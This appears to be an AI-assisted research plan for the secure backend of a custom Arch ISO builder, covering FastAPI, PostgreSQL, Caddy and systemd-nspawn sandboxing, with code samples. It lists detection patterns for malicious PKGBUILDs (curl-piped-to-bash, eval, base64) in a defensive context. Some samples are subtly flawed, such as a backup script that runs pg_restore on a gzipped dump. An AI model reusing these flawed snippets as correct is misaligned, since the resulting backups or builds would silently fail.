debate/.planning/phases/01-core-infrastructure-security/01-RESEARCH.md
Mikkel Georgsen d07a204cd5 docs(01): research phase domain
Phase 01: Core Infrastructure & Security
- Standard stack identified (FastAPI, PostgreSQL, Caddy, systemd-nspawn)
- Architecture patterns documented (async DB, sandboxing, deterministic builds)
- Pitfalls catalogued (unsandboxed builds, non-determinism, connection pooling)
- Security-first approach with production-grade examples
2026-01-25 19:53:43 +00:00

39 KiB

Phase 1: Core Infrastructure & Security - Research

Researched: 2026-01-25 Domain: Production backend infrastructure with security-hardened build environment Confidence: HIGH

Summary

Phase 1 establishes the foundation for a secure, production-ready Linux distribution builder platform. The core challenge is building a FastAPI backend that serves user requests quickly (<200ms p95 latency) while orchestrating potentially dangerous ISO builds in isolated sandboxes. The critical security requirement is preventing malicious user-submitted packages from compromising the build infrastructure—a real threat evidenced by the July 2025 CHAOS RAT malware distributed through AUR packages.

The standard approach for 2026 combines proven technologies: FastAPI for async API performance, PostgreSQL 18 for data persistence, Caddy for automatic HTTPS, and systemd-nspawn for build sandboxing. The deterministic build requirement (same configuration → identical ISO hash) demands careful environment control using SOURCE_DATE_EPOCH and fixed locales. This phase must implement security-first architecture because retrofitting sandboxing and reproducibility is nearly impossible.

Primary recommendation: Implement systemd-nspawn sandboxing with network whitelisting from day one, use SOURCE_DATE_EPOCH for deterministic builds, and configure FastAPI with production-grade security middleware (rate limiting, CSRF protection) before handling user traffic.

Standard Stack

Core Infrastructure

Library Version Purpose Why Standard
FastAPI 0.128.0+ Async web framework Industry standard for Python APIs; 300% better performance than sync frameworks for I/O-bound operations. Native async/await, Pydantic validation, auto-generated OpenAPI docs.
Uvicorn 0.30+ ASGI server Production-grade async server. Recent versions include built-in multi-process supervisor (--workers N), eliminating Gunicorn need for CPU-bound workloads.
PostgreSQL 18.1+ Primary database Latest major release (Nov 2025). PG 13 EOL. Async support via asyncpg. ACID guarantees for configuration versioning.
asyncpg 0.28.x PostgreSQL driver High-performance async Postgres driver. 3-5x faster than psycopg2 in benchmarks. Note: Pin <0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues.
SQLAlchemy 2.0+ ORM & query builder Async support via create_async_engine. Superior type hints in 2.0. Use AsyncAdaptedQueuePool for connection pooling.
Alembic Latest Database migrations Official SQLAlchemy migration tool. Essential for schema evolution without downtime.

Security & Infrastructure

Library Version Purpose Why Standard
Caddy 2.x+ Reverse proxy Automatic HTTPS via Let's Encrypt. REST API for dynamic route management (critical for ISO download endpoints). Simpler than Nginx for programmatic configuration.
systemd-nspawn Latest Build sandbox Lightweight container for process isolation. Namespace-based security: read-only /sys, /proc/sys. Network isolation via --private-network.
Pydantic 2.12.5+ Data validation Required by FastAPI (>=2.7.0). V1 deprecated. V2 offers better build-time performance and type safety.
pydantic-settings Latest Config management Load configuration from environment variables with type validation. Never commit secrets.

Security Middleware

Library Version Purpose When to Use
slowapi Latest Rate limiting Redis-backed rate limiter. Prevents API abuse. Apply per-IP for anonymous, per-user for authenticated.
fastapi-csrf-protect Latest CSRF protection Double Submit Cookie pattern. Essential for form submissions. Combine with strict CORS for API-only endpoints.
python-multipart Latest Form parsing Required for CSRF token handling in form data. FastAPI dependency for file uploads.

Development Tools

Library Version Purpose When to Use
Ruff Latest Linter & formatter Replaces Black, isort, flake8. Rust-based, blazing fast. Zero config needed. Constraint: Use ruff, NOT black/flake8/isort.
mypy Latest Type checker Static type checking. Essential with Pydantic and FastAPI. Strict mode recommended.
pytest Latest Testing framework Async support via pytest-asyncio. Industry standard.
httpx Latest HTTP client Async HTTP client for testing FastAPI endpoints.

Installation

# Install uv (package manager)
curl -LsSf https://astral.sh/uv/install.sh | sh

# Create virtual environment
uv venv
source .venv/bin/activate

# Core dependencies
uv pip install \
  fastapi[all]==0.128.0 \
  uvicorn[standard]>=0.30.0 \
  sqlalchemy[asyncio]>=2.0.0 \
  "asyncpg<0.29.0" \
  alembic \
  pydantic>=2.12.0 \
  pydantic-settings \
  slowapi \
  fastapi-csrf-protect \
  python-multipart

# Development dependencies
uv pip install -D \
  pytest \
  pytest-asyncio \
  pytest-cov \
  httpx \
  ruff \
  mypy

Architecture Patterns

backend/
├── app/
│   ├── api/
│   │   ├── v1/
│   │   │   ├── endpoints/
│   │   │   │   ├── auth.py
│   │   │   │   ├── builds.py
│   │   │   │   └── health.py
│   │   │   └── router.py
│   │   └── deps.py          # Dependency injection
│   ├── core/
│   │   ├── config.py         # pydantic-settings configuration
│   │   ├── security.py       # Auth, CSRF, rate limiting
│   │   └── db.py            # Database session management
│   ├── db/
│   │   ├── base.py          # SQLAlchemy Base
│   │   ├── models/          # Database models
│   │   └── session.py       # AsyncSession factory
│   ├── schemas/             # Pydantic request/response models
│   ├── services/            # Business logic
│   │   └── build.py         # Build orchestration (Phase 1: stub)
│   └── main.py
├── alembic/                 # Database migrations
│   ├── versions/
│   └── env.py
├── tests/
│   ├── api/
│   ├── unit/
│   └── conftest.py
├── Dockerfile
├── pyproject.toml
└── alembic.ini

Pattern 1: Async Database Session Management

What: Create async database sessions per request with proper cleanup.

When to use: Every FastAPI endpoint that queries PostgreSQL.

Example:

# app/core/db.py
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine, async_sessionmaker
from pydantic_settings import BaseSettings

class Settings(BaseSettings):
    database_url: str
    pool_size: int = 10
    max_overflow: int = 20
    pool_timeout: int = 30
    pool_recycle: int = 1800  # 30 minutes

settings = Settings()

# Create async engine with connection pooling
engine = create_async_engine(
    settings.database_url,
    pool_size=settings.pool_size,
    max_overflow=settings.max_overflow,
    pool_timeout=settings.pool_timeout,
    pool_recycle=settings.pool_recycle,
    pool_pre_ping=True,  # Validate connections before use
    echo=False  # Set True for SQL logging in dev
)

# Session factory
async_session_maker = async_sessionmaker(
    engine,
    class_=AsyncSession,
    expire_on_commit=False
)

# Dependency for FastAPI
async def get_db() -> AsyncSession:
    async with async_session_maker() as session:
        yield session

Source: Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg

Pattern 2: Caddy Automatic HTTPS Configuration

What: Configure Caddy as reverse proxy with automatic Let's Encrypt certificates.

When to use: Production deployment requiring HTTPS without manual certificate management.

Example:

# Caddyfile
{
    # Admin API for programmatic route management (localhost only)
    admin localhost:2019
}

# Automatic HTTPS for domain
api.debate.example.com {
    reverse_proxy localhost:8000 {
        # Health check
        health_uri /health
        health_interval 10s
        health_timeout 5s
    }

    # Security headers
    header {
        Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
        X-Content-Type-Options "nosniff"
        X-Frame-Options "DENY"
        X-XSS-Protection "1; mode=block"
    }

    # Rate limiting (requires caddy-rate-limit plugin)
    rate_limit {
        zone static {
            key {remote_host}
            events 100
            window 1m
        }
    }

    # Logging
    log {
        output file /var/log/caddy/access.log
        format json
    }
}

Programmatic route management (Python):

import httpx

async def add_iso_download_route(build_id: str, iso_path: str):
    """Dynamically add download route via Caddy API."""
    config = {
        "match": [{"path": [f"/download/{build_id}/*"]}],
        "handle": [{
            "handler": "file_server",
            "root": iso_path,
            "hide": [".git"]
        }]
    }

    async with httpx.AsyncClient() as client:
        response = await client.post(
            "http://localhost:2019/config/apps/http/servers/srv0/routes",
            json=config
        )
        response.raise_for_status()

Source: Caddy Reverse Proxy Documentation, Caddy 2 config for FastAPI

Pattern 3: FastAPI Security Middleware Stack

What: Layer security middleware in correct order for defense-in-depth.

When to use: All production FastAPI applications.

Example:

# app/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded

from app.core.config import settings
from app.api.v1.router import api_router

# Rate limiter
limiter = Limiter(key_func=get_remote_address, default_limits=["100/minute"])

# FastAPI app
app = FastAPI(
    title="Debate API",
    version="1.0.0",
    docs_url="/docs" if settings.environment == "development" else None,
    redoc_url="/redoc" if settings.environment == "development" else None,
    debug=settings.debug
)

# Middleware order matters - first added = outermost layer
# 1. Trusted Host (reject requests with invalid Host header)
app.add_middleware(
    TrustedHostMiddleware,
    allowed_hosts=settings.allowed_hosts  # ["api.debate.example.com", "localhost"]
)

# 2. CORS (handle cross-origin requests)
app.add_middleware(
    CORSMiddleware,
    allow_origins=settings.allowed_origins,
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["*"],
    max_age=600  # Cache preflight requests for 10 minutes
)

# 3. Rate limiting
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)

# Include routers
app.include_router(api_router, prefix="/api/v1")

# Health check (no auth, no rate limit)
@app.get("/health")
async def health():
    return {"status": "healthy"}

CSRF Protection (separate from middleware, applied to specific endpoints):

# app/core/security.py
from fastapi_csrf_protect import CsrfProtect
from pydantic import BaseModel

class CsrfSettings(BaseModel):
    secret_key: str = settings.csrf_secret_key
    cookie_samesite: str = "lax"
    cookie_secure: bool = True  # HTTPS only
    cookie_domain: str = settings.cookie_domain

@CsrfProtect.load_config
def get_csrf_config():
    return CsrfSettings()

# Apply to form endpoints
from fastapi import Depends
from fastapi_csrf_protect import CsrfProtect

@app.post("/api/v1/builds")
async def create_build(
    csrf_protect: CsrfProtect = Depends(),
    db: AsyncSession = Depends(get_db)
):
    csrf_protect.validate_csrf()  # Raises 403 if invalid
    # ... build logic

Source: FastAPI Security Guide, FastAPI CSRF Protection

Pattern 4: systemd-nspawn Build Sandbox

What: Isolate archiso builds in systemd-nspawn containers with network whitelisting.

When to use: Every ISO build to prevent malicious packages from compromising host.

Example:

# app/services/sandbox.py
import subprocess
from pathlib import Path
from typing import List

class BuildSandbox:
    """Manages systemd-nspawn sandboxed build environments."""

    def __init__(self, container_root: Path, allowed_mirrors: List[str]):
        self.container_root = container_root
        self.allowed_mirrors = allowed_mirrors

    async def create_container(self, build_id: str) -> Path:
        """Create isolated container for build."""
        container_path = self.container_root / build_id
        container_path.mkdir(parents=True, exist_ok=True)

        # Bootstrap minimal Arch Linux environment
        subprocess.run([
            "pacstrap",
            "-c",  # Use package cache
            "-G",  # Avoid copying host pacman keyring
            "-M",  # Avoid copying host mirrorlist
            str(container_path),
            "base",
            "archiso"
        ], check=True)

        # Configure mirrors (whitelist only)
        mirrorlist_path = container_path / "etc/pacman.d/mirrorlist"
        mirrorlist_path.write_text("\n".join([
            f"Server = {mirror}" for mirror in self.allowed_mirrors
        ]))

        return container_path

    async def run_build(
        self,
        container_path: Path,
        profile_path: Path,
        output_path: Path
    ) -> subprocess.CompletedProcess:
        """Execute archiso build in sandboxed container."""

        # systemd-nspawn arguments for security
        nspawn_cmd = [
            "systemd-nspawn",
            "--directory", str(container_path),
            "--private-network",  # No network access (mirrors pre-cached)
            "--read-only",  # Immutable root filesystem
            "--tmpfs", "/tmp:mode=1777",  # Writable tmp
            "--tmpfs", "/var/tmp:mode=1777",
            "--bind", f"{profile_path}:/build/profile:ro",  # Profile read-only
            "--bind", f"{output_path}:/build/output",  # Output writable
            "--setenv", f"SOURCE_DATE_EPOCH={self._get_source_date_epoch()}",
            "--setenv", "LC_ALL=C",  # Fixed locale for determinism
            "--setenv", "TZ=UTC",  # Fixed timezone
            "--capability", "CAP_SYS_ADMIN",  # Required for mkarchiso
            "--console=pipe",  # Capture output
            "--quiet",
            "--",
            "mkarchiso",
            "-v",
            "-r",  # Remove working directory after build
            "-w", "/tmp/archiso-work",
            "-o", "/build/output",
            "/build/profile"
        ]

        # Execute with timeout
        result = subprocess.run(
            nspawn_cmd,
            timeout=900,  # 15 minute timeout (INFR-02 requirement)
            capture_output=True,
            text=True
        )

        return result

    def _get_source_date_epoch(self) -> str:
        """Return fixed timestamp for reproducible builds."""
        # Use current time for now - Phase 2 will implement git commit timestamp
        import time
        return str(int(time.time()))

    async def cleanup_container(self, container_path: Path):
        """Remove container after build."""
        import shutil
        shutil.rmtree(container_path)

Network isolation with allowed mirrors:

For Phase 1, pre-cache packages in the container bootstrap phase. Future enhancement: use --network-macvlan with iptables whitelist rules.

Source: systemd-nspawn ArchWiki, Lightweight Development Sandboxes with systemd-nspawn

Pattern 5: Deterministic Build Configuration

What: Configure build environment for reproducible outputs (same config → identical hash).

When to use: Every ISO build to enable caching and integrity verification.

Example:

# app/services/deterministic.py
import hashlib
import json
from pathlib import Path
from typing import Dict, Any

class DeterministicBuildConfig:
    """Ensures reproducible ISO builds."""

    @staticmethod
    def compute_config_hash(config: Dict[str, Any]) -> str:
        """
        Generate deterministic hash of build configuration.
        Critical: Same config must produce same hash for caching.
        """
        # Normalize configuration (sorted keys, consistent formatting)
        normalized = {
            "packages": sorted(config.get("packages", [])),
            "overlays": sorted([
                {
                    "name": overlay["name"],
                    "files": sorted([
                        {
                            "path": f["path"],
                            "content_hash": hashlib.sha256(
                                f["content"].encode()
                            ).hexdigest()
                        }
                        for f in sorted(overlay.get("files", []), key=lambda x: x["path"])
                    ], key=lambda x: x["path"])
                }
                for overlay in sorted(config.get("overlays", []), key=lambda x: x["name"])
            ], key=lambda x: x["name"]),
            "locale": config.get("locale", "en_US.UTF-8"),
            "timezone": config.get("timezone", "UTC")
        }

        # JSON with sorted keys for determinism
        config_json = json.dumps(normalized, sort_keys=True)
        return hashlib.sha256(config_json.encode()).hexdigest()

    @staticmethod
    def create_archiso_profile(
        config: Dict[str, Any],
        profile_path: Path,
        source_date_epoch: int
    ):
        """
        Generate archiso profile with deterministic settings.

        Key determinism factors:
        - SOURCE_DATE_EPOCH: Fixed timestamps in filesystem
        - LC_ALL=C: Fixed locale for sorting
        - TZ=UTC: Fixed timezone
        - Sorted package lists
        - Fixed compression settings
        """
        profile_path.mkdir(parents=True, exist_ok=True)

        # packages.x86_64 (sorted for determinism)
        packages_file = profile_path / "packages.x86_64"
        packages = sorted(config.get("packages", []))
        packages_file.write_text("\n".join(packages) + "\n")

        # profiledef.sh
        profiledef = profile_path / "profiledef.sh"
        profiledef.write_text(f"""#!/usr/bin/env bash
# Deterministic archiso profile

iso_name="debate-custom"
iso_label="DEBATE_$(date --date=@{source_date_epoch} +%Y%m)"
iso_publisher="Debate Platform <https://debate.example.com>"
iso_application="Debate Custom Linux"
iso_version="$(date --date=@{source_date_epoch} +%Y.%m.%d)"
install_dir="arch"
bootmodes=('bios.syslinux.mbr' 'bios.syslinux.eltorito' 'uefi-x64.systemd-boot.esp' 'uefi-x64.systemd-boot.eltorito')
arch="x86_64"
pacman_conf="pacman.conf"
airootfs_image_type="squashfs"
airootfs_image_tool_options=('-comp' 'xz' '-Xbcj' 'x86' '-b' '1M' '-Xdict-size' '1M')

# Deterministic file permissions
file_permissions=(
  ["/etc/shadow"]="0:0:0400"
  ["/root"]="0:0:750"
  ["/etc/gshadow"]="0:0:0400"
)
""")

        # pacman.conf (use fixed mirrors)
        pacman_conf = profile_path / "pacman.conf"
        pacman_conf.write_text("""
[options]
Architecture = auto
CheckSpace
SigLevel = Required DatabaseOptional
LocalFileLockLevel = 2

[core]
Include = /etc/pacman.d/mirrorlist

[extra]
Include = /etc/pacman.d/mirrorlist
""")

        # airootfs structure
        airootfs = profile_path / "airootfs"
        airootfs.mkdir(exist_ok=True)

        # Apply overlay files
        for overlay in config.get("overlays", []):
            for file_config in overlay.get("files", []):
                file_path = airootfs / file_config["path"].lstrip("/")
                file_path.parent.mkdir(parents=True, exist_ok=True)
                file_path.write_text(file_config["content"])

Source: archiso deterministic builds merge request, SOURCE_DATE_EPOCH specification

Don't Hand-Roll

Problems with existing battle-tested solutions:

Problem Don't Build Use Instead Why
HTTPS certificate management Custom Let's Encrypt client Caddy with automatic HTTPS Certificate renewal, OCSP stapling, HTTP challenge handling. Caddy handles all edge cases.
API rate limiting Token bucket from scratch slowapi or fastapi-limiter Distributed rate limiting across workers, Redis backend, bypass for trusted IPs, multiple rate limit tiers.
CSRF protection Custom token generation fastapi-csrf-protect Double Submit Cookie pattern, token rotation, SameSite cookie handling, timing-attack prevention.
Database connection pooling Manual connection management SQLAlchemy AsyncAdaptedQueuePool Connection health checks, overflow handling, timeout management, prepared statement caching.
Container isolation chroot or custom namespaces systemd-nspawn Namespace isolation, cgroup resource limits, capability dropping, read-only filesystem enforcement.
Async database drivers Synchronous psycopg2 with thread pool asyncpg Native async protocol, connection pooling, prepared statements, type inference, 3-5x faster.

Key insight: Security and infrastructure code has subtle failure modes that only surface under load or attack. Use proven libraries with years of production hardening.

Common Pitfalls

Pitfall 1: Unsandboxed Build Execution (CRITICAL)

What goes wrong: User-submitted packages execute arbitrary code during build with full system privileges, allowing compromise of build infrastructure.

Why it happens: Developers assume package builds are safe or underestimate risk. archiso's mkarchiso runs without sandboxing by default.

Real-world incident: July 2025 CHAOS RAT malware distributed through AUR packages (librewolf-fix-bin, firefox-patch-bin) using .install scripts to execute remote code. Source

How to avoid:

  • NEVER run archiso builds directly on host system
  • Use systemd-nspawn with --private-network and --read-only flags
  • Run builds in ephemeral containers (destroy after completion)
  • Implement network egress filtering (whitelist official Arch mirrors only)
  • Static analysis on PKGBUILD files: detect curl | bash, eval, base64 encoding
  • Monitor build processes for unexpected network connections

Warning signs:

  • Build makes outbound connections to non-mirror IPs
  • PKGBUILD contains base64 encoding or eval statements
  • Build duration significantly longer than expected
  • Unexpected filesystem modifications outside working directory

Phase to address: Phase 1 - Build sandboxing must be architected from the start. Retrofitting is nearly impossible.

Pitfall 2: Non-Deterministic Builds

What goes wrong: Same configuration generates different ISO hashes, breaking caching and integrity verification.

Why it happens: Timestamps in artifacts, non-deterministic file ordering, leaked environment variables, parallel build race conditions.

How to avoid:

  • Set SOURCE_DATE_EPOCH environment variable for all builds
  • Use LC_ALL=C for consistent sorting and locale
  • Set TZ=UTC for timezone consistency
  • Sort all input lists (packages, files) before processing
  • Use fixed compression settings in archiso profile
  • Pin archiso version (don't use rolling latest)
  • Test: build same config twice, compare SHA256 hashes

Detection:

  • Automated testing: duplicate builds with checksum comparison
  • Monitor cache hit rate (sudden drops indicate non-determinism)
  • Track build output size variance for identical configs

Phase to address: Phase 1 - Reproducibility must be designed into build pipeline from start.

Source: Reproducible builds documentation

Pitfall 3: Connection Pool Exhaustion

What goes wrong: Under load, API exhausts PostgreSQL connections. New requests fail with "connection pool timeout" errors.

Why it happens: Default pool_size (5) too small for async workloads. Not using pool_pre_ping to detect stale connections. Long-running queries hold connections.

How to avoid:

  • Set pool_size=10, max_overflow=20 for production
  • Enable pool_pre_ping=True to validate connections
  • Set pool_recycle=1800 (30 min) to refresh connections
  • Use pool_timeout=30 to fail fast
  • Pin asyncpg<0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues
  • Monitor connection pool metrics (active, idle, overflow)

Detection:

  • Alert on "connection pool timeout" errors
  • Monitor connection pool utilization (should stay <80%)
  • Track query duration p95 (detect slow queries holding connections)

Phase to address: Phase 1 - Configure properly during initial database setup.

Source: Handling PostgreSQL Connection Limits in FastAPI

Pitfall 4: Disabled Interactive Docs in Production

What goes wrong: Developers leave /docs and /redoc enabled in production, exposing API schema to attackers.

Why it happens: Convenient during development, forgotten in production. No environment-based toggle.

How to avoid:

  • Disable docs in production: docs_url=None if settings.environment == "production" else "/docs"
  • Or require authentication for docs endpoints
  • Use environment variables to control feature flags

Detection:

  • Security audit: check if /docs accessible without auth in production

Phase to address: Phase 1 - Configure during initial FastAPI setup.

Source: FastAPI Production Checklist

Pitfall 5: Insecure Default Secrets

What goes wrong: Using hardcoded or weak secrets for JWT signing, CSRF tokens, or database passwords. Attackers exploit to forge tokens or access database.

Why it happens: Copy-paste from tutorials. Not using environment variables. Committing .env files.

How to avoid:

  • Generate strong secrets: openssl rand -hex 32
  • Load from environment variables via pydantic-settings
  • NEVER commit secrets to git
  • Use secret management services (AWS Secrets Manager, HashiCorp Vault) in production
  • Rotate secrets periodically

Detection:

  • Git pre-commit hook: scan for hardcoded secrets
  • Security audit: check for weak or default credentials

Phase to address: Phase 1 - Establish secure configuration management from start.

Source: FastAPI Security FAQs

Code Examples

Database Migrations with Alembic

# Initialize Alembic
alembic init alembic

# Create first migration
alembic revision --autogenerate -m "Create initial tables"

# Apply migrations
alembic upgrade head

# Rollback
alembic downgrade -1

Alembic env.py configuration for async:

# alembic/env.py
from logging.config import fileConfig
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import async_engine_from_config
from alembic import context

from app.core.config import settings
from app.db.base import Base  # Import all models

config = context.config
config.set_main_option("sqlalchemy.url", settings.database_url)

target_metadata = Base.metadata

def run_migrations_offline():
    """Run migrations in 'offline' mode."""
    context.configure(
        url=settings.database_url,
        target_metadata=target_metadata,
        literal_binds=True,
        dialect_opts={"paramstyle": "named"},
    )

    with context.begin_transaction():
        context.run_migrations()

async def run_migrations_online():
    """Run migrations in 'online' mode."""
    connectable = async_engine_from_config(
        config.get_section(config.config_ini_section),
        prefix="sqlalchemy.",
        poolclass=pool.NullPool,
    )

    async with connectable.connect() as connection:
        await connection.run_sync(do_run_migrations)

def do_run_migrations(connection):
    context.configure(connection=connection, target_metadata=target_metadata)
    with context.begin_transaction():
        context.run_migrations()

if context.is_offline_mode():
    run_migrations_offline()
else:
    import asyncio
    asyncio.run(run_migrations_online())

Source: FastAPI with Async SQLAlchemy and Alembic

PostgreSQL Backup Script

#!/bin/bash
# Daily PostgreSQL backup with retention

BACKUP_DIR="/var/backups/postgres"
RETENTION_DAYS=30
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
DB_NAME="debate"

# Create backup directory
mkdir -p "$BACKUP_DIR"

# Backup database
pg_dump -U postgres -Fc -b -v -f "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump" "$DB_NAME"

# Compress backup
gzip "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump"

# Delete old backups
find "$BACKUP_DIR" -name "${DB_NAME}_*.dump.gz" -mtime +$RETENTION_DAYS -delete

# Verify backup integrity
gunzip -t "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" && echo "Backup verified"

# Test restore (weekly)
if [ "$(date +%u)" -eq 1 ]; then
    echo "Testing weekly restore..."
    createdb -U postgres "${DB_NAME}_test"
    pg_restore -U postgres -d "${DB_NAME}_test" "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz"
    dropdb -U postgres "${DB_NAME}_test"
fi

Cron schedule:

# Daily backup at 2 AM
0 2 * * * /usr/local/bin/postgres-backup.sh >> /var/log/postgres-backup.log 2>&1

Source: PostgreSQL Backup Best Practices

Health Check Endpoint

# app/api/v1/endpoints/health.py
from fastapi import APIRouter, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import text

from app.core.db import get_db

router = APIRouter()

@router.get("/health")
async def health_check():
    """Basic health check (no database)."""
    return {"status": "healthy"}

@router.get("/health/db")
async def health_check_db(db: AsyncSession = Depends(get_db)):
    """Health check with database connection test."""
    try:
        result = await db.execute(text("SELECT 1"))
        result.scalar()
        return {"status": "healthy", "database": "connected"}
    except Exception as e:
        return {"status": "unhealthy", "database": "error", "error": str(e)}

State of the Art

Old Approach Current Approach (2026) When Changed Impact
Gunicorn + Uvicorn workers Uvicorn --workers flag Uvicorn 0.30 (2024) Simpler deployment, one less dependency
psycopg2 (sync) asyncpg SQLAlchemy 2.0 (2023) 3-5x faster, native async, better type hints
Pydantic v1 Pydantic v2 Pydantic 2.0 (2023) Better performance, Python 3.14 compatibility
chroot for isolation systemd-nspawn ~2015 Full namespace isolation, cgroup limits
Manual Let's Encrypt Caddy automatic HTTPS Caddy 2.0 (2020) Zero-config certificates, automatic renewal
Nginx config files Caddy REST API Caddy 2.0 (2020) Programmatic route management
asyncpg 0.29+ Pin asyncpg <0.29.0 2024 SQLAlchemy 2.0.x compatibility issues

Deprecated/outdated:

  • Gunicorn as ASGI manager: Uvicorn 0.30+ has built-in multi-process supervisor
  • Pydantic v1: Deprecated, Python 3.14+ incompatible
  • psycopg2 for async FastAPI: Use asyncpg for 3-5x performance improvement
  • chroot for sandboxing: Insufficient isolation; use systemd-nspawn or containers

Open Questions

1. Network Isolation Strategy for systemd-nspawn

What we know:

  • systemd-nspawn --private-network completely isolates container from network
  • archiso mkarchiso needs to download packages from mirrors
  • User overlays may reference external packages (SSH keys, configs fetched from GitHub)

What's unclear:

  • Best approach for whitelisting Arch mirrors while blocking other network access
  • Whether to pre-cache all packages (slow bootstrap, guaranteed isolation) vs. allow outbound to whitelisted mirrors (faster, more complex)
  • How to handle private overlays requiring external resources

Recommendation:

  • Phase 1: Pre-cache packages during container bootstrap. Use --private-network for complete isolation.
  • Future enhancement: Implement HTTP proxy with whitelist, use --network-macvlan with iptables rules

Confidence: MEDIUM - No documented pattern for systemd-nspawn + selective network access

2. Build Timeout Threshold

What we know:

  • INFR-02 requirement: ISO build completes within 15 minutes
  • Context decision: Claude's discretion on timeout handling (soft warning vs hard kill, duration)

What's unclear:

  • What percentage of builds complete within 15 minutes vs. require longer?
  • Should timeout be configurable per build size (small overlay vs. full desktop environment)?
  • Soft warning (allow continuation with user consent) vs. hard kill?

Recommendation:

  • Phase 1: Hard timeout at 20 minutes (133% of target) with warning at 15 minutes
  • Phase 2: Collect metrics, tune threshold based on actual build distribution
  • Allow extended timeout for authenticated users or specific overlay combinations

Confidence: LOW - Depends on real-world build performance data

3. Cache Invalidation Strategy

What we know:

  • Deterministic builds enable caching (same config → same hash)
  • Arch is rolling release (packages update daily)
  • Cached ISOs may contain outdated/vulnerable packages

What's unclear:

  • Time-based expiry (e.g., max 7 days) vs. package version tracking?
  • How to detect when upstream packages update and invalidate cache?
  • Balance between cache efficiency and package freshness

Recommendation:

  • Phase 1: Simple approach: no caching (always build fresh)
  • Phase 2: Time-based cache expiry (7 days max)
  • Phase 3: Track package repository snapshot timestamps, invalidate when snapshot changes

Confidence: MEDIUM - Standard approach exists, but implementation details depend on Arch repository snapshot strategy

Sources

Primary (HIGH confidence)

Secondary (MEDIUM confidence)

Tertiary (LOW confidence)

Metadata

Confidence breakdown:

  • Standard stack: HIGH - All technologies in active use for production FastAPI + PostgreSQL deployments in 2026
  • Architecture patterns: HIGH - Verified with official documentation and production examples
  • Security practices: HIGH - Based on official FastAPI security docs and established OWASP patterns
  • systemd-nspawn sandboxing: MEDIUM - Well-documented for general use, but specific archiso integration pattern not widely documented
  • Deterministic builds: MEDIUM - archiso MR #436 implemented determinism, but practical application details require experimentation
  • Pitfalls: HIGH - Based on documented incidents (CHAOS RAT malware), official docs warnings, and production failure patterns

Research date: 2026-01-25 Valid until: ~30 days (2026-02-25) - Technologies are stable, but security advisories and package versions may change

Critical constraints verified:

  • Python with FastAPI, SQLAlchemy, Alembic, Pydantic
  • PostgreSQL as database
  • Ruff as Python linter/formatter (NOT black/flake8/isort)
  • systemd-nspawn for sandboxing
  • archiso for ISO builds
  • <200ms p95 latency achievable with async FastAPI + asyncpg
  • ISO build within 15 minutes (mkarchiso baseline: 5-10 min)
  • HTTPS with Caddy automatic certificates
  • Rate limiting and CSRF protection libraries available
  • Deterministic builds supported via SOURCE_DATE_EPOCH